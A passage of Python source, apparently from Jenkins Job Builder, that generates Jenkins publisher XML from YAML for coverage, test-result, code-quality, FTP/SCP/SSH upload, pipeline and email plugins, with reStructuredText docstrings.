targets = XML.SubElement(failing, 'targets', {
'class': 'enum-map',
'enum-type': 'hudson.plugins.cobertura.targets.CoverageMetric'})
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.CoverageMetric'
).text = 'CONDITIONAL'
XML.SubElement(entry, 'int').text = '0'
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.CoverageMetric'
).text = 'LINE'
XML.SubElement(entry, 'int').text = '0'
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.CoverageMetric'
).text = 'METHOD'
XML.SubElement(entry, 'int').text = '0'
XML.SubElement(cobertura, 'sourceEncoding').text = 'ASCII'
def cobertura(parser, xml_parent, data):
"""yaml: cobertura
Generate a cobertura coverage report.
Requires the Jenkins :jenkins-wiki:`Cobertura Coverage Plugin
<Cobertura+Plugin>`.
:arg str report-file: This is a file name pattern that can be used
to locate the cobertura xml report files (optional)
:arg bool only-stable: Include only stable builds (default false)
:arg bool fail-no-reports: fail builds if no coverage reports are found
(default false)
:arg bool fail-unhealthy: Unhealthy projects will be failed (default false)
:arg bool fail-unstable: Unstable projects will be failed (default false)
:arg bool health-auto-update: Auto update threshold for health on
successful build (default false)
:arg bool stability-auto-update: Auto update threshold for stability on
successful build (default false)
:arg bool zoom-coverage-chart: Zoom the coverage chart and crop area below
the minimum and above the maximum coverage of the past reports
(default false)
:arg str source-encoding: Override the source encoding (default ASCII)
:arg dict targets:
:targets: (packages, files, classes, method, line, conditional)
* **healthy** (`int`): Healthy threshold (default 0)
* **unhealthy** (`int`): Unhealthy threshold (default 0)
* **failing** (`int`): Failing threshold (default 0)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/cobertura001.yaml
:language: yaml
"""
cobertura = XML.SubElement(xml_parent,
'hudson.plugins.cobertura.CoberturaPublisher')
XML.SubElement(cobertura, 'coberturaReportFile').text = data.get(
'report-file', '**/coverage.xml')
XML.SubElement(cobertura, 'onlyStable').text = str(
data.get('only-stable', False)).lower()
XML.SubElement(cobertura, 'failUnhealthy').text = str(
data.get('fail-unhealthy', False)).lower()
XML.SubElement(cobertura, 'failUnstable').text = str(
data.get('fail-unstable', False)).lower()
XML.SubElement(cobertura, 'autoUpdateHealth').text = str(
data.get('health-auto-update', False)).lower()
XML.SubElement(cobertura, 'autoUpdateStability').text = str(
data.get('stability-auto-update', False)).lower()
XML.SubElement(cobertura, 'zoomCoverageChart').text = str(
data.get('zoom-coverage-chart', False)).lower()
XML.SubElement(cobertura, 'failNoReports').text = str(
data.get('fail-no-reports', False)).lower()
healthy = XML.SubElement(cobertura, 'healthyTarget')
targets = XML.SubElement(healthy, 'targets', {
'class': 'enum-map',
'enum-type': 'hudson.plugins.cobertura.targets.CoverageMetric'})
for item in data['targets']:
item_name = next(iter(item.keys()))
item_values = item.get(item_name, 0)
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry,
'hudson.plugins.cobertura.targets.'
'CoverageMetric').text = str(item_name).upper()
XML.SubElement(entry, 'int').text = str(item_values.get('healthy', 0))
unhealthy = XML.SubElement(cobertura, 'unhealthyTarget')
targets = XML.SubElement(unhealthy, 'targets', {
'class': 'enum-map',
'enum-type': 'hudson.plugins.cobertura.targets.CoverageMetric'})
for item in data['targets']:
item_name = next(iter(item.keys()))
item_values = item.get(item_name, 0)
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.'
'CoverageMetric').text = str(item_name).upper()
XML.SubElement(entry, 'int').text = str(item_values.get('unhealthy',
0))
failing = XML.SubElement(cobertura, 'failingTarget')
targets = XML.SubElement(failing, 'targets', {
'class': 'enum-map',
'enum-type': 'hudson.plugins.cobertura.targets.CoverageMetric'})
for item in data['targets']:
item_name = next(iter(item.keys()))
item_values = item.get(item_name, 0)
entry = XML.SubElement(targets, 'entry')
XML.SubElement(entry, 'hudson.plugins.cobertura.targets.'
'CoverageMetric').text = str(item_name).upper()
XML.SubElement(entry, 'int').text = str(item_values.get('failing', 0))
XML.SubElement(cobertura, 'sourceEncoding').text = data.get(
'source-encoding', 'ASCII')
def jacoco(parser, xml_parent, data):
"""yaml: jacoco
Generate a JaCoCo coverage report.
Requires the Jenkins :jenkins-wiki:`JaCoCo Plugin <JaCoCo+Plugin>`.
:arg str exec-pattern: This is a file name pattern that can be used to
locate the jacoco report files (default
``**/**.exec``)
:arg str class-pattern: This is a file name pattern that can be used
to locate class files (default ``**/classes``)
:arg str source-pattern: This is a file name pattern that can be used
to locate source files (default ``**/src/main/java``)
:arg bool update-build-status: Update the build according to the results
(default false)
:arg str inclusion-pattern: This is a file name pattern that can be used
to include certain class files (optional)
:arg str exclusion-pattern: This is a file name pattern that can be used
to exclude certain class files (optional)
:arg dict targets:
:targets: (instruction, branch, complexity, line, method, class)
* **healthy** (`int`): Healthy threshold (default 0)
* **unhealthy** (`int`): Unhealthy threshold (default 0)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/jacoco001.yaml
:language: yaml
"""
jacoco = XML.SubElement(xml_parent,
'hudson.plugins.jacoco.JacocoPublisher')
XML.SubElement(jacoco, 'execPattern').text = data.get(
'exec-pattern', '**/**.exec')
XML.SubElement(jacoco, 'classPattern').text = data.get(
'class-pattern', '**/classes')
XML.SubElement(jacoco, 'sourcePattern').text = data.get(
'source-pattern', '**/src/main/java')
XML.SubElement(jacoco, 'changeBuildStatus').text = data.get(
'update-build-status', False)
XML.SubElement(jacoco, 'inclusionPattern').text = data.get(
'inclusion-pattern', '')
XML.SubElement(jacoco, 'exclusionPattern').text = data.get(
'exclusion-pattern', '')
itemsList = ['instruction',
'branch',
'complexity',
'line',
'method',
'class']
for item in data['targets']:
item_name = next(iter(item.keys()))
if item_name not in itemsList:
raise JenkinsJobsException("item entered is not valid must be "
"one of: %s" % ",".join(itemsList))
item_values = item.get(item_name, 0)
XML.SubElement(jacoco,
'maximum' +
item_name.capitalize() +
'Coverage').text = str(item_values.get('healthy', 0))
XML.SubElement(jacoco,
'minimum' +
item_name.capitalize() +
'Coverage').text = str(item_values.get('unhealthy', 0))
def ftp(parser, xml_parent, data):
"""yaml: ftp
Upload files via FTP.
Requires the Jenkins :jenkins-wiki:`Publish over FTP Plugin
<Publish+Over+FTP+Plugin>`.
:arg str site: name of the ftp site
:arg str target: destination directory
:arg bool target-is-date-format: whether target is a date format. If true,
raw text should be quoted (default false)
:arg bool clean-remote: should the remote directory be deleted before
transferring files (default false)
:arg str source: source path specifier
:arg str excludes: excluded file pattern (optional)
:arg str remove-prefix: prefix to remove from uploaded file paths
(optional)
:arg bool fail-on-error: fail the build if an error occurs (default false).
:arg bool flatten: only create files on the server, don't create
directories (default false).
Example:
.. literalinclude:: /../../tests/publishers/fixtures/ftp001.yaml
:language: yaml
"""
console_prefix = 'FTP: '
plugin_tag = 'jenkins.plugins.publish__over__ftp.BapFtpPublisherPlugin'
publisher_tag = 'jenkins.plugins.publish__over__ftp.BapFtpPublisher'
transfer_tag = 'jenkins.plugins.publish__over__ftp.BapFtpTransfer'
plugin_reference_tag = 'jenkins.plugins.publish_over_ftp.' \
'BapFtpPublisherPlugin'
(_, transfer_node) = base_publish_over(xml_parent,
data,
console_prefix,
plugin_tag,
publisher_tag,
transfer_tag,
plugin_reference_tag)
XML.SubElement(transfer_node, 'asciiMode').text = 'false'
def junit(parser, xml_parent, data):
"""yaml: junit
Publish JUnit test results.
:arg str results: results filename
:arg bool keep-long-stdio: Retain long standard output/error in test
results (default true).
:arg float health-scale-factor: Amplification factor to apply to test
failures when computing the test result contribution to the build health
score. (default 1.0)
:arg bool allow-empty-results: Do not fail the build if the JUnit files are
missing (default false).
:arg bool test-stability: Add historical information about test
results stability (default false).
Requires the Jenkins :jenkins-wiki:`Test stability Plugin
<Test+stability+plugin>`.
:arg bool claim-build: Allow claiming of failed tests (default false)
Requires the Jenkins :jenkins-wiki:`Claim Plugin <Claim+plugin>`.
:arg bool measurement-plots: Create measurement plots (default false)
Requires the Jenkins :jenkins-wiki:`Measurement Plots Plugin
<Measurement+Plots+Plugin>`.
:arg bool flaky-test-reports: Publish flaky test reports (default false).
Requires the Jenkins :jenkins-wiki:`Flaky Test Handler Plugin
<Flaky+Test+Handler+Plugin>`.
Minimal example using defaults:
.. literalinclude:: /../../tests/publishers/fixtures/junit001.yaml
:language: yaml
Full example:
.. literalinclude:: /../../tests/publishers/fixtures/junit002.yaml
:language: yaml
"""
junitresult = XML.SubElement(xml_parent,
'hudson.tasks.junit.JUnitResultArchiver')
junitresult.set('plugin', 'junit')
XML.SubElement(junitresult, 'testResults').text = data['results']
XML.SubElement(junitresult, 'keepLongStdio').text = str(
data.get('keep-long-stdio', True)).lower()
XML.SubElement(junitresult, 'healthScaleFactor').text = str(
data.get('health-scale-factor', '1.0'))
XML.SubElement(junitresult, 'allowEmptyResults').text = str(
data.get('allow-empty-results', False)).lower()
datapublisher = XML.SubElement(junitresult, 'testDataPublishers')
if str(data.get('test-stability', False)).lower() == 'true':
XML.SubElement(datapublisher,
'de.esailors.jenkins.teststability'
'.StabilityTestDataPublisher')
if str(data.get('claim-build', False)).lower() == 'true':
XML.SubElement(datapublisher,
'hudson.plugins.claim.ClaimTestDataPublisher')
if str(data.get('measurement-plots', False)).lower() == 'true':
XML.SubElement(datapublisher,
'hudson.plugins.measurement__plots.TestDataPublisher')
if str(data.get('flaky-test-reports', False)).lower() == 'true':
XML.SubElement(datapublisher,
'com.google.jenkins.flakyTestHandler.plugin'
'.JUnitFlakyTestDataPublisher')
def cucumber_reports(parser, xml_parent, data):
"""yaml: cucumber-reports
This plugin creates pretty cucumber-jvm html reports on jenkins.
Requires the Jenkins :jenkins-wiki:`cucumber reports
<Cucumber+Reports+Plugin>`.
:arg str json-reports-path: The path relative to the workspace of
the json reports generated by cucumber-jvm e.g. target - leave
empty to scan the whole workspace (default '')
:arg str file-include-pattern: include pattern (default '')
:arg str file-exclude-pattern: exclude pattern (default '')
:arg str plugin-url-path: The path to the jenkins user content url
e.g. :samp:`http://host:port[/jenkins/]plugin` - leave empty if jenkins
url root is host:port (default '')
:arg bool skipped-fails: skipped steps to cause the build to fail
(default false)
:arg bool pending-fails: pending steps to cause the build to fail
(default false)
:arg bool undefined-fails: undefined steps to cause the build to fail
(default false)
:arg bool missing-fails: missing steps to cause the build to fail
(default false)
:arg bool no-flash-charts: use javascript charts instead of flash charts
(default false)
:arg bool ignore-failed-tests: entire build to fail when these tests fail
(default false)
:arg bool parallel-testing: run same test in parallel for multiple devices
(default false)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/cucumber_reports001.yaml
:language: yaml
.. literalinclude::
/../../tests/publishers/fixtures/cucumber_reports002.yaml
:language: yaml
"""
cucumber_reports = XML.SubElement(xml_parent,
'net.masterthought.jenkins.'
'CucumberReportPublisher')
XML.SubElement(cucumber_reports, 'jsonReportDirectory').text = str(
data.get('json-reports-path', ''))
XML.SubElement(cucumber_reports, 'pluginUrlPath').text = str(
data.get('plugin-url-path', ''))
XML.SubElement(cucumber_reports, 'fileIncludePattern').text = str(
data.get('file-include-pattern', ''))
XML.SubElement(cucumber_reports, 'fileExcludePattern').text = str(
data.get('file-exclude-pattern', ''))
XML.SubElement(cucumber_reports, 'skippedFails').text = str(
data.get('skipped-fails', False)).lower()
XML.SubElement(cucumber_reports, 'pendingFails').text = str(
data.get('pending-fails', False)).lower()
XML.SubElement(cucumber_reports, 'undefinedFails').text = str(
data.get('undefined-fails', False)).lower()
XML.SubElement(cucumber_reports, 'missingFails').text = str(
data.get('missing-fails', False)).lower()
XML.SubElement(cucumber_reports, 'noFlashCharts').text = str(
data.get('no-flash-charts', False)).lower()
XML.SubElement(cucumber_reports, 'ignoreFailedTests').text = str(
data.get('ignore-failed-tests', False)).lower()
XML.SubElement(cucumber_reports, 'parallelTesting').text = str(
data.get('parallel-testing', False)).lower()
def cucumber_testresult(parser, xml_parent, data):
"""yaml: cucumber-testresult
Publish cucumber test results.
Requires the Jenkins :jenkins-wiki:`cucumber testresult
<Cucumber+Test+Result+Plugin>`.
:arg str results: results filename (required)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/cucumber_testresult.yaml
:language: yaml
"""
cucumber_result = XML.SubElement(xml_parent,
'org.jenkinsci.plugins.cucumber.'
'jsontestsupport.'
'CucumberTestResultArchiver')
filepath = data.get('results', None)
if filepath is None:
raise MissingAttributeError('results')
XML.SubElement(cucumber_result, 'testResults').text = str(filepath)
def xunit(parser, xml_parent, data):
"""yaml: xunit
Publish tests results. Requires the Jenkins :jenkins-wiki:`xUnit Plugin
<xUnit+Plugin>`.
:arg str thresholdmode: Whether thresholds represents an absolute number
of tests or a percentage. Either 'number' or 'percent'. (default
'number')
:arg list thresholds: Thresholds for both 'failed' and 'skipped' tests.
:threshold (`dict`): Threshold values to set, where missing, xUnit
should default to an internal value of 0. Each test threshold
should contain the following:
* **unstable** (`int`)
* **unstablenew** (`int`)
* **failure** (`int`)
* **failurenew** (`int`)
:arg int test-time-margin: Give the report time margin value in ms, before
to fail if not new unless the option **requireupdate** is set for the
configured framework. (default 3000)
:arg list types: Frameworks to configure, and options. Supports the
following: ``aunit``, ``boosttest``, ``checktype``, ``cpptest``,
``cppunit``, ``ctest``, ``dotnettest``, ``embunit``, ``fpcunit``,
``gtest``, ``junit``, ``mstest``, ``nunit``, ``phpunit``, ``tusar``,
``unittest``, and ``valgrind``.
The 'custom' type is not supported.
:type (`dict`): each type can be configured using the following:
* **pattern** (`str`): An Ant pattern to look for Junit result
files, relative to the workspace root.
* **requireupdate** (`bool`): fail the build whenever fresh tests
results have not been found (default true).
* **deleteoutput** (`bool`): delete temporary JUnit files
(default true).
* **skip-if-no-test-files** (`bool`): Skip parsing this xUnit type
report if there are no test reports files (default false).
* **stoponerror** (`bool`): Fail the build whenever an error occur
during a result file processing (default true).
Example:
.. literalinclude:: /../../tests/publishers/fixtures/xunit001.yaml
:language: yaml
"""
logger = logging.getLogger(__name__)
xunit = XML.SubElement(xml_parent, 'xunit')
# Map our internal types to the XML element names used by Jenkins plugin
types_to_plugin_types = {
'aunit': 'AUnitJunitHudsonTestType',
'boosttest': 'BoostTestJunitHudsonTestType',
'checktype': 'CheckType',
'cpptest': 'CppTestJunitHudsonTestType',
'cppunit': 'CppUnitJunitHudsonTestType',
'ctest': 'CTestType',
'dotnettest': 'XUnitDotNetTestType', # since plugin v1.93
'embunit': 'EmbUnitType', # since plugin v1.84
'fpcunit': 'FPCUnitJunitHudsonTestType',
'gtest': 'GoogleTestType',
'junit': 'JUnitType',
'mstest': 'MSTestJunitHudsonTestType',
'nunit': 'NUnitJunitHudsonTestType',
'phpunit': 'PHPUnitJunitHudsonTestType',
'tusar': 'TUSARJunitHudsonTestType',
'unittest': 'UnitTestJunitHudsonTestType',
'valgrind': 'ValgrindJunitHudsonTestType',
# FIXME should implement the 'custom' type
}
implemented_types = types_to_plugin_types.keys() # shortcut
# Unit framework we are going to generate xml for
supported_types = []
for configured_type in data['types']:
type_name = next(iter(configured_type.keys()))
if type_name not in implemented_types:
logger.warn("Requested xUnit type '%s' is not yet supported",
type_name)
else:
# Append for generation
supported_types.append(configured_type)
# Generate XML for each of the supported framework types
xmltypes = XML.SubElement(xunit, 'types')
for supported_type in supported_types:
framework_name = next(iter(supported_type.keys()))
xmlframework = XML.SubElement(xmltypes,
types_to_plugin_types[framework_name])
XML.SubElement(xmlframework, 'pattern').text = (
supported_type[framework_name].get('pattern', ''))
XML.SubElement(xmlframework, 'failIfNotNew').text = str(
supported_type[framework_name].get('requireupdate', True)).lower()
XML.SubElement(xmlframework, 'deleteOutputFiles').text = str(
supported_type[framework_name].get('deleteoutput', True)).lower()
XML.SubElement(xmlframework, 'skipNoTestFiles').text = str(
supported_type[framework_name].get('skip-if-no-test-files',
False)).lower()
XML.SubElement(xmlframework, 'stopProcessingIfError').text = str(
supported_type[framework_name].get('stoponerror', True)).lower()
xmlthresholds = XML.SubElement(xunit, 'thresholds')
for t in data.get('thresholds', []):
if not ('failed' in t or 'skipped' in t):
logger.warn(
"Unrecognized threshold, should be 'failed' or 'skipped'")
continue
elname = ("org.jenkinsci.plugins.xunit.threshold.%sThreshold" %
next(iter(t.keys())).title())
el = XML.SubElement(xmlthresholds, elname)
for threshold_name, threshold_value in next(iter(t.values())).items():
# Normalize and craft the element name for this threshold
elname = "%sThreshold" % threshold_name.lower().replace(
'new', 'New')
XML.SubElement(el, elname).text = str(threshold_value)
# Whether to use percent of exact number of tests.
# Thresholdmode is either:
# - 1 : absolute (number of tests), default.
# - 2 : relative (percentage of tests)
thresholdmode = '1'
if 'percent' == data.get('thresholdmode', 'number'):
thresholdmode = '2'
XML.SubElement(xunit, 'thresholdMode').text = thresholdmode
extra_config = XML.SubElement(xunit, 'extraConfiguration')
XML.SubElement(extra_config, 'testTimeMargin').text = str(
data.get('test-time-margin', '3000'))
def _violations_add_entry(xml_parent, name, data):
vmin = data.get('min', 10)
vmax = data.get('max', 999)
vunstable = data.get('unstable', 999)
pattern = data.get('pattern', None)
entry = XML.SubElement(xml_parent, 'entry')
XML.SubElement(entry, 'string').text = name
tconfig = XML.SubElement(entry, 'hudson.plugins.violations.TypeConfig')
XML.SubElement(tconfig, 'type').text = name
XML.SubElement(tconfig, 'min').text = str(vmin)
XML.SubElement(tconfig, 'max').text = str(vmax)
XML.SubElement(tconfig, 'unstable').text = str(vunstable)
XML.SubElement(tconfig, 'usePattern').text = 'false'
if pattern:
XML.SubElement(tconfig, 'pattern').text = pattern
else:
XML.SubElement(tconfig, 'pattern')
def violations(parser, xml_parent, data):
"""yaml: violations
Publish code style violations.
Requires the Jenkins :jenkins-wiki:`Violations Plugin <Violations>`.
The violations component accepts any number of dictionaries keyed
by the name of the violations system. The dictionary has the
following values:
:arg int min: sunny threshold
:arg int max: stormy threshold
:arg int unstable: unstable threshold
:arg str pattern: report filename pattern
Any system without a dictionary provided will use default values.
Valid systems are:
checkstyle, codenarc, cpd, cpplint, csslint, findbugs, fxcop,
gendarme, jcreport, jslint, pep8, perlcritic, pmd, pylint,
simian, stylecop
Example:
.. literalinclude:: /../../tests/publishers/fixtures/violations001.yaml
:language: yaml
"""
violations = XML.SubElement(xml_parent,
'hudson.plugins.violations.'
'ViolationsPublisher')
config = XML.SubElement(violations, 'config')
suppressions = XML.SubElement(config, 'suppressions',
{'class': 'tree-set'})
XML.SubElement(suppressions, 'no-comparator')
configs = XML.SubElement(config, 'typeConfigs')
XML.SubElement(configs, 'no-comparator')
for name in ['checkstyle',
'codenarc',
'cpd',
'cpplint',
'csslint',
'findbugs',
'fxcop',
'gendarme',
'jcreport',
'jslint',
'pep8',
'perlcritic',
'pmd',
'pylint',
'simian',
'stylecop']:
_violations_add_entry(configs, name, data.get(name, {}))
XML.SubElement(config, 'limit').text = '100'
XML.SubElement(config, 'sourcePathPattern')
XML.SubElement(config, 'fauxProjectPath')
XML.SubElement(config, 'encoding').text = 'default'
def findbugs(parser, xml_parent, data):
"""yaml: findbugs
FindBugs reporting for builds
Requires the Jenkins :jenkins-wiki:`FindBugs Plugin
<FindBugs+Plugin>`.
:arg str pattern: specifies the generated raw FindBugs XML report files,
such as \*\*/findbugs.xml or \*\*/findbugsXml.xml. (default '')
:arg bool rank-priority: Use rank as priority (default false)
:arg str include-files: Comma separated list of files to include.
(default '')
:arg str exclude-files: Comma separated list of files to exclude.
(default '')
:arg bool can-run-on-failed: Weather or not to run plug-in on failed builds
(default false)
:arg bool should-detect-modules: Determines if Ant or Maven modules should
be detected for all files that contain warnings. (default false)
:arg int healthy: Sunny threshold (default '')
:arg int unhealthy: Stormy threshold (default '')
:arg str health-threshold: Threshold priority for health status
('low', 'normal' or 'high', defaulted to 'low')
:arg bool dont-compute-new: If set to false, computes new warnings based on
the reference build (default true)
:arg bool use-delta-values: Use delta for new warnings. (default false)
:arg bool use-previous-build-as-reference: If set then the number of new
warnings will always be calculated based on the previous build.
Otherwise the reference build. (default false)
:arg bool use-stable-build-as-reference: The number of new warnings will be
calculated based on the last stable build, allowing reverts of unstable
builds where the number of warnings was decreased. (default false)
:arg dict thresholds:
:thresholds:
* **unstable** (`dict`)
:unstable: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
* **failed** (`dict`)
:failed: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
Minimal Example:
.. literalinclude:: /../../tests/reporters/fixtures/findbugs-minimal.yaml
Full Example:
.. literalinclude:: /../../tests/publishers/fixtures/findbugs01.yaml
"""
findbugs = XML.SubElement(xml_parent,
'hudson.plugins.findbugs.FindBugsPublisher')
findbugs.set('plugin', 'findbugs')
helpers.findbugs_settings(findbugs, data)
helpers.build_trends_publisher('[FINDBUGS] ', findbugs, data)
def checkstyle(parser, xml_parent, data):
"""yaml: checkstyle
Publish trend reports with Checkstyle.
Requires the Jenkins :jenkins-wiki:`Checkstyle Plugin <Checkstyle+Plugin>`.
The checkstyle component accepts a dictionary with the
following values:
:arg str pattern: Report filename pattern (optional)
:arg bool can-run-on-failed: Also runs for failed builds, instead of just
stable or unstable builds (default false)
:arg bool should-detect-modules: Determines if Ant or Maven modules should
be detected for all files that contain warnings (default false)
:arg int healthy: Sunny threshold (optional)
:arg int unhealthy: Stormy threshold (optional)
:arg str health-threshold: Threshold priority for health status
('low', 'normal' or 'high', defaulted to 'low')
:arg dict thresholds: Mark build as failed or unstable if the number of
errors exceeds a threshold. (optional)
:thresholds:
* **unstable** (`dict`)
:unstable: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
* **failed** (`dict`)
:failed: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
:arg str default-encoding: Encoding for parsing or showing files (optional)
:arg bool do-not-resolve-relative-paths: (default false)
:arg bool dont-compute-new: If set to false, computes new warnings based on
the reference build (default true)
:arg bool use-previous-build-as-reference: determines whether to always
use the previous build as the reference build (default false)
:arg bool use-stable-build-as-reference: The number of new warnings will be
calculated based on the last stable build, allowing reverts of unstable
builds where the number of warnings was decreased. (default false)
:arg bool use-delta-values: If set then the number of new warnings is
calculated by subtracting the total number of warnings of the current
build from the reference build.
(default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/checkstyle004.yaml
:language: yaml
Full example:
.. literalinclude:: /../../tests/publishers/fixtures/checkstyle006.yaml
:language: yaml
"""
def convert_settings(lookup, data):
"""Helper to convert settings from one key to another
"""
for old_key in list(data.keys()):
if old_key in lookup:
data.setdefault(lookup[old_key], data[old_key])
del data[old_key]
xml_element = XML.SubElement(xml_parent,
'hudson.plugins.checkstyle.'
'CheckStylePublisher')
# Convert old style yaml to new style
convert_settings({
'unHealthy': 'unhealthy',
'healthThreshold': 'health-threshold',
'defaultEncoding': 'default-encoding',
'canRunOnFailed': 'can-run-on-failed',
'shouldDetectModules': 'should-detect-modules'
}, data)
threshold_data = data.get('thresholds', {})
for threshold in ['unstable', 'failed']:
convert_settings({
'totalAll': 'total-all',
'totalHigh': 'total-high',
'totalNormal': 'total-normal',
'totalLow': 'total-low'
}, threshold_data.get(threshold, {}))
helpers.build_trends_publisher('[CHECKSTYLE] ', xml_element, data)
def scp(parser, xml_parent, data):
"""yaml: scp
Upload files via SCP
Requires the Jenkins :jenkins-wiki:`SCP Plugin <SCP+plugin>`.
When writing a publisher macro, it is important to keep in mind that
Jenkins uses Ant's `SCP Task
<https://ant.apache.org/manual/Tasks/scp.html>`_ via the Jenkins
:jenkins-wiki:`SCP Plugin <SCP+plugin>` which relies on `FileSet
<https://ant.apache.org/manual/Types/fileset.html>`_
and `DirSet <https://ant.apache.org/manual/Types/dirset.html>`_ patterns.
The relevant piece of documentation is excerpted below:
Source points to files which will be uploaded. You can use ant
includes syntax, eg. ``folder/dist/*.jar``. Path is constructed from
workspace root. Note that you cannot point files outside the workspace
directory. For example providing: ``../myfile.txt`` won't work...
Destination points to destination folder on remote site. It will be
created if doesn't exists and relative to root repository path. You
can define multiple blocks of source/destination pairs.
This means that absolute paths, e.g., ``/var/log/**`` will not work and
will fail to compile. All paths need to be relative to the directory that
the publisher runs and the paths have to be contained inside of that
directory. The relative working directory is usually::
/home/jenkins/workspace/${JOB_NAME}
:arg str site: name of the scp site
:arg str target: destination directory
:arg str source: source path specifier
:arg bool keep-hierarchy: keep the file hierarchy when uploading
(default false)
:arg bool copy-after-failure: copy files even if the job fails
(default false)
:arg bool copy-console: copy the console log (default false); if
specified, omit 'source'
Example:
.. literalinclude:: /../../tests/publishers/fixtures/scp001.yaml
:language: yaml
"""
site = data['site']
scp = XML.SubElement(xml_parent,
'be.certipost.hudson.plugin.SCPRepositoryPublisher')
XML.SubElement(scp, 'siteName').text = site
entries = XML.SubElement(scp, 'entries')
for entry in data['files']:
entry_e = XML.SubElement(entries, 'be.certipost.hudson.plugin.Entry')
XML.SubElement(entry_e, 'filePath').text = entry['target']
XML.SubElement(entry_e, 'sourceFile').text = entry.get('source', '')
if entry.get('keep-hierarchy', False):
XML.SubElement(entry_e, 'keepHierarchy').text = 'true'
else:
XML.SubElement(entry_e, 'keepHierarchy').text = 'false'
if entry.get('copy-console', False):
XML.SubElement(entry_e, 'copyConsoleLog').text = 'true'
else:
XML.SubElement(entry_e, 'copyConsoleLog').text = 'false'
if entry.get('copy-after-failure', False):
XML.SubElement(entry_e, 'copyAfterFailure').text = 'true'
else:
XML.SubElement(entry_e, 'copyAfterFailure').text = 'false'
def ssh(parser, xml_parent, data):
"""yaml: ssh
Upload files via SCP.
Requires the Jenkins :jenkins-wiki:`Publish over SSH Plugin
<Publish+Over+SSH+Plugin>`.
:arg str site: name of the ssh site
:arg str target: destination directory
:arg bool target-is-date-format: whether target is a date format. If true,
raw text should be quoted (default false)
:arg bool clean-remote: should the remote directory be deleted before
transferring files (default false)
:arg str source: source path specifier
:arg str command: a command to execute on the remote server (optional)
:arg int timeout: timeout in milliseconds for the Exec command (optional)
:arg bool use-pty: run the exec command in pseudo TTY (default false)
:arg str excludes: excluded file pattern (optional)
:arg str remove-prefix: prefix to remove from uploaded file paths
(optional)
:arg bool fail-on-error: fail the build if an error occurs (default false).
:arg bool always-publish-from-master: transfer the files through the master
before being sent to the remote server (defaults false)
:arg bool flatten: only create files on the server, don't create
directories (default false).
Example:
.. literalinclude:: /../../tests/publishers/fixtures/ssh001.yaml
:language: yaml
"""
console_prefix = 'SSH: '
plugin_tag = 'jenkins.plugins.publish__over__ssh.BapSshPublisherPlugin'
publisher_tag = 'jenkins.plugins.publish__over__ssh.BapSshPublisher'
transfer_tag = 'jenkins.plugins.publish__over__ssh.BapSshTransfer'
plugin_reference_tag = 'jenkins.plugins.publish_over_ssh.' \
'BapSshPublisherPlugin'
base_publish_over(xml_parent,
data,
console_prefix,
plugin_tag,
publisher_tag,
transfer_tag,
plugin_reference_tag)
def pipeline(parser, xml_parent, data):
"""yaml: pipeline
Specify a downstream project in a pipeline.
Requires the Jenkins :jenkins-wiki:`Build Pipeline Plugin
<Build+Pipeline+Plugin>`.
:arg str project: the name of the downstream project
:arg str predefined-parameters: parameters to pass to the other
job (optional)
:arg bool current-parameters: Whether to include the parameters passed
to the current build to the triggered job (optional)
:arg str property-file: Use properties from file (optional)
:arg bool fail-on-missing: Blocks the triggering of the downstream jobs
if any of the property files are not found in the workspace.
Only valid when 'property-file' is specified.
(default false)
:arg str file-encoding: Encoding of contents of the files. If not
specified, default encoding of the platform is used. Only valid when
'property-file' is specified. (optional)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/pipeline002.yaml
:language: yaml
.. literalinclude:: /../../tests/publishers/fixtures/pipeline003.yaml
:language: yaml
You can build pipeline jobs that are re-usable in different pipelines by
using a :ref:`job-template` to define the pipeline jobs,
and variable substitution to specify the name of
the downstream job in the pipeline.
Job-specific substitutions are useful here (see :ref:`project`).
See 'samples/pipeline.yaml' for an example pipeline implementation.
"""
if 'project' in data and data['project'] != '':
pippub = XML.SubElement(xml_parent,
'au.com.centrumsystems.hudson.plugin.'
'buildpipeline.trigger.BuildPipelineTrigger')
configs = XML.SubElement(pippub, 'configs')
if 'predefined-parameters' in data:
params = XML.SubElement(configs,
'hudson.plugins.parameterizedtrigger.'
'PredefinedBuildParameters')
properties = XML.SubElement(params, 'properties')
properties.text = data['predefined-parameters']
if ('current-parameters' in data
and data['current-parameters']):
XML.SubElement(configs,
'hudson.plugins.parameterizedtrigger.'
'CurrentBuildParameters')
if 'property-file' in data and data['property-file']:
params = XML.SubElement(configs,
'hudson.plugins.parameterizedtrigger.'
'FileBuildParameters')
properties = XML.SubElement(params, 'propertiesFile')
properties.text = data['property-file']
failOnMissing = XML.SubElement(params, 'failTriggerOnMissing')
failOnMissing.text = str(
data.get('fail-on-missing', False)).lower()
if 'file-encoding' in data:
XML.SubElement(params, 'encoding'
).text = data['file-encoding']
XML.SubElement(pippub, 'downstreamProjectNames').text = data['project']
def email(parser, xml_parent, data):
"""yaml: email
Email notifications on build failure.
Requires the Jenkins :jenkins-wiki:`Mailer Plugin
<Mailer>`.
:arg str recipients: Space separated list of recipient email addresses
(required)
:arg bool notify-every-unstable-build: Send an email for every
unstable build (default true)
:arg bool send-to-individuals: Send an email to the individual
who broke the build (default false)
Example:
